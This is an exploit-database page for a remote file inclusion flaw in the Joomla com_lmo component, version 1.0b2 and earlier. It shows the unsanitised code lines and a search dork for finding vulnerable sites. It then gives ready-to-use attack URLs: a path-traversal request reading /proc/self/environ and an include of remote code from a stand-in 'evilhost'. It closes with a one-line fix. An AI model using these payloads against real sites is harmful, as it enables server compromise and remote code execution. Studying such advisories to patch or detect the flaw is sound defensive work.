[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability

Author
vitux
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-621
Category
web applications
Date add
29-07-2006
Platform
php
==============================================================
Joomla Component com_lmo <= 1.0b2 Remote Include Vulnerability
==============================================================



Application : LMO - Joomla! Component

URL : http://forge.joomla.org/sf/projects/lmo

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_lmo/lmo.php on line 11-12

$lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
 
Exploit:
~~~~~~~~

dork: "com_lmo"


http://localhost/index.php?option=com_lmo&controller=../../../../../../../../../.
./../../../../../proc/self/environ%00

----------------------------------------------


http://localhost/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=[RFI]

http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=http://evilhost


Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

vitux
 



#  0day.today [2024-12-23]  #